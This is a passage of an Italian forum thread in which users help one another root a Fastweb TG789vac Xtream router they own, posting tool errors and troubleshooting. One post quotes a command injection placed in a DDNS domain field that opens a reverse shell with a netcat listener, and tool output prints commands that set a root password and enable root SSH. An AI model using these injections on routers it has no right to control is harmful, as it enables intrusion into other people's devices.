[GUIDA] Root e Modding TG789vac Xtream 35b (VBNT-F)

  • 618 Risposte
  • 308957 Visite

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline larsen64it

  • VIP
  • *****
  • 2697
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #495 il: 04 Aprile 2020, 19:13 »
Scusa ma che cosa non è chiaro da questa foto:
https://www.ilpuntotecnico.com/forum/index.php/topic,78382.msg260806.html#msg260806
Una volta che uno ha caricato il fw 214 non bisogna toccare nulla.
Si avvia AFG, si seleziona Generic (Advanced DDNS), ip 192.168.1.254, nome utente Administrator, password si lascia vuota, si spunta So che cosa sto facendo...., modo di esecuzione Advanced DDNS, in servizio servizio DDNS si inserisce dyndns.org e si da esegui.

Offline Mariorosa

  • Nuovo Iscritto
  • *
  • 17
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #496 il: 04 Aprile 2020, 20:34 »
ho seguito esattamente i passi che mi avete scritto e questo è il risultato
Codice: [Seleziona]
Authentication failed, debug values are: ['Got CSRF token: 68af38fad7e7f9e6dd0245c2acb2f0127d7cf3c3f3e38408d9aad8e9e615ef30', "A value b'7c6ecb245af399d0019fa79d988099c9897f4365bee1c5a822768494342bb8547c38213018e7e7c3c468024db3e907c596e92a2f878e3d17b646522ec030ac0181096c604210a64ecb059071ab90ed917236b11f500e777d591230084582905a534b64244c7f22f9ecba5063253abdb3deb5c18538a4fa064f88e046d5c1084cca810d696cf068ef017788c1c3006ed83e821d5ccdf2e4839b5fe72ed43f47f73abc7dce863da3b72cc60c808e9bae7ab572779f55ccf40c93fca658a317b34e4bf1913b8908fb97d91e2ce61b21c6a81c70dfee5b60baad5a0cc0d7b59712b4e399d2adca9280d243a58ad6f5caaf9ed06025d924c4e1870464a4e071f4ed96'", 'br.response <Response [200]>', "Challenge received: {'error': 'failed'}"]
Exception in Tkinter callback
Traceback (most recent call last):
  File "libautoflashgui.py", line 37, in srp6authenticate
    M = usr.process_challenge(binascii.unhexlify(j['s']), binascii.unhexlify(j['B']))
KeyError: 's'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "tkinter\__init__.py", line 1705, in __call__
  File "autoflashgui.py", line 211, in run
    self.status.config(text=_('Firmware flashing enabled but firmware file name does not exist!'))
  File "libautoflashgui.py", line 132, in mainScript
    srp6authenticate(br, host, username, password)
  File "libautoflashgui.py", line 55, in srp6authenticate
    print(_("Exception: ") + str(sys.exc_info()[0]))
NameError: name 'sys' is not defined
« Ultima modifica: 04 Aprile 2020, 20:53 da MisterFTTH »

Offline LuKePicci

  • Global Moderator
  • VIP
  • *****
  • 2789
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #497 il: 04 Aprile 2020, 21:18 »
riprova a fare tutto dopo aver resettato il device, tieni inoltre presente che @larsen64it aveva testato questa cosa sul fastgate con firmware IAD, tu hai messo l'MOS che non so come funzioni su questo dispositivo in particolare ma di solito uno ha account administrator e l'altro usa account limitati fastweb. O scopri come si chiama quello giusto per questo device o carichi il firmware IAD come gli altri.
« Ultima modifica: 10 Maggio 2020, 14:53 da MisterFTTH »

Offline FrancYescO

  • VIP
  • *****
  • 3382
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #498 il: 04 Aprile 2020, 21:23 »
Altra cosa che forse qui nessuno ha fatto penso sia usare il .exe ... siam sicuri che è abbastanza aggiornato?

Altrimenti devi provare a usare direttamente il .py installando python e dipendenze su windows..

Offline Mariorosa

  • Nuovo Iscritto
  • *
  • 17
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #499 il: 04 Aprile 2020, 21:28 »
Ho spento e riacceso il pc, ho riprovato a usare autoflashgui e questa volta
Codice: [Seleziona]
<Response [503]>
Connect attempt 57197
<Response [200]>
Modem up
Authenticating
Authentication failed, debug values are: ['Got CSRF token: 093cc8b232197ac9085bdace81c4e84095f31279fd4ed4911dc9ee4537496a0f', "A value b'3a1cac6838ab0a62d821554cdd37aaf9e2e4a8658ce826eac8368121ac3d6c0e11dfd734109b3cea00a4f520ae1b87ca321c791882133abffb0f9d4659e5985aad7c1ea6c94e08970f63feac325f9e9b87c05c43d76d3faf1bdb245b3cf905b38919af33547b864e4601f587b6a5267cacd2ea98eab7e8c2269c6327101702588802c5c97732c85360ee35dc659d121e36e59151af49c6bee65c5e8b03f3c853a807cfef0df0849531fd4b93ad789b3f150336c776b7497c7b6e4e08140b4860351462e596cb81e09980919163a02259c0fddf65730c7d70307679340851e526b2750f8346ade243fdcf781425593d36ff09300d15cb1a398c6ac9633400f5d6'", 'br.response <Response [200]>', "Challenge received: {'error': 'failed'}"]
Exception in Tkinter callback
Traceback (most recent call last):
  File "libautoflashgui.py", line 37, in srp6authenticate
    M = usr.process_challenge(binascii.unhexlify(j['s']), binascii.unhexlify(j['B']))
KeyError: 's'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "tkinter\__init__.py", line 1705, in __call__
  File "autoflashgui.py", line 211, in run
    self.status.config(text=_('Firmware flashing enabled but firmware file name does not exist!'))
  File "libautoflashgui.py", line 132, in mainScript
    srp6authenticate(br, host, username, password)
  File "libautoflashgui.py", line 55, in srp6authenticate
    print(_("Exception: ") + str(sys.exc_info()[0]))
NameError: name 'sys' is not defined
adesso rimetto iad e poi riprovo
« Ultima modifica: 05 Aprile 2020, 03:54 da MisterFTTH »

Offline FrancYescO

  • VIP
  • *****
  • 3382
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #500 il: 04 Aprile 2020, 21:49 »
ma il login per quello non è username fastweb e password vuota?

Offline Mariorosa

  • Nuovo Iscritto
  • *
  • 17
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #501 il: 04 Aprile 2020, 22:10 »
ho rimesso fw 214 iad, poi ho resettato, ho rifatto la procedura nei servizi wan  del router, ho messo nel dominio www.ooo.com; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 192.168.1.254 1337 >/tmp/f & , messo admin user e admin passw.
Poi ho fatto partire netcat con la stringa nc -lvvp 1337.  H fatto partire autoflashgui  ma adesso ho un dubbio, devo mettere in nome utente Administrator o admin. e inserire anche la passw admin.
Grazie

Offline FrancYescO

  • VIP
  • *****
  • 3382
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #502 il: 04 Aprile 2020, 22:14 »
ma perchè hai fatto la storia nei servizi wan? il compito di AFG è proprio automatizzare quella parte..
in AFG devi mettere le credenziali che ti permettono di accedere all'interfaccia del modem https://www.fastweb.it/myfastweb/assistenza/guide/technicolor-tg789vac-xtream-35b/

in pratica o fastweb o Administrator, admin non esiste.

Offline Mariorosa

  • Nuovo Iscritto
  • *
  • 17
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #503 il: 04 Aprile 2020, 22:27 »
Ho sostituito Administrator co fastweb e questa è la risposta
Codice: [Seleziona]
Modem up
Authenticating
Sending command: sed -i 's#/root:.*$#/root:/bin/ash#' /etc/passwd;echo root:root | chpasswd;sed -i.save 's/#//' /etc/inittab;uci add dropbear dropbear;uci rename dropbear.@dropbear[-1]=afg;uci set dropbear.afg.enable='1';uci set dropbear.afg.Interface='lan';uci set dropbear.afg.Port='22';uci set dropbear.afg.IdleTimeout='600';uci set dropbear.afg.PasswordAuth='on';uci set dropbear.afg.RootPasswordAuth='on';uci set dropbear.afg.RootLogin='1';uci commit dropbear;/etc/init.d/dropbear enable;/etc/init.d/dropbear restart;uci set $(uci show|grep -m 1 `fw3 -q print|egrep 'es -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment "!fw3: .+" -j DROP'|sed -n's/^iptables.\+fw3: \(.\+\)".\+/\1/p'`|sed -n"s/\(.\+\).name='.\+'$/\1/p").target=ACCEPT;uci commit;/etc/init.d/firewall reload
Please try a ssh connection now to 192.168.1.254 with username root and password root (change password immediately with passwd!)  Rebooting your modem now is recommended to stop any services that have been disabled
« Ultima modifica: 04 Aprile 2020, 22:30 da MisterFTTH »

Offline FrancYescO

  • VIP
  • *****
  • 3382
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #504 il: 04 Aprile 2020, 22:29 »
bhe direi ha funzionato.. puoi accedere in SSH.

Offline larsen64it

  • VIP
  • *****
  • 2697
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #505 il: 05 Aprile 2020, 03:20 »
Eppure l'avevo messo in grassetto che bisognava inserire Administrator o fastweb..... vabbuò l'ho inserito adesso:
https://www.ilpuntotecnico.com/forum/index.php/topic,78382.msg260806.html#msg260806

Offline Mariorosa

  • Nuovo Iscritto
  • *
  • 17
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #506 il: 08 Aprile 2020, 00:21 »
sono entrato in ssh ed ho installato la gui di ansuel.
Sul modem tutte le luci sono verdi, nell'interfaccia  mi da connesso, ma non ho internet.. Ho messo le impostazioni per infostrada come letto sul forum
Cosa  posso fare?
Grazie

Offline LuKePicci

  • Global Moderator
  • VIP
  • *****
  • 2789
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #507 il: 08 Aprile 2020, 01:51 »
@Mariorosa Sei OT, una volta installata la custom GUI per problemi ad essa inerenti (configurazioni non funzionanti fatte attraverso di essa comprese) devi chiedere nel relativo thread.

Offline Mariorosa

  • Nuovo Iscritto
  • *
  • 17
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #508 il: 08 Aprile 2020, 11:51 »
Ok grazie

Offline DoloresAbernathy

  • Nuovo Iscritto
  • *
  • 16
Re:[GUIDA] Root e Modding FASTGate TG789vac XTREAM 35b (VBNT-F)
« Risposta #509 il: 26 Luglio 2020, 16:41 »
Salve a tutti,
Possiedo il modem in oggetto, marca fastweb, vorrei poterlo utilizzare con altri operatori.
Ho letto vari post su questo sito, ma essendo nuova dell'argomento, ci ho capito molto poco.
Ho provato a installare il firmware Uno ( che da quello che ho capito non è manco compatibile con questa versione firmware) tramite il programma Tfttp ma sebbene la procedura sia completa, quando vado sul 192.168.1.254 mi appare sempre il firmware fastweb.
Qualcuno potrebbe spiegarmi in modo accessibile ad una neofita qual'è il metodo più semplice e veloce per raggiungere il mio scopo?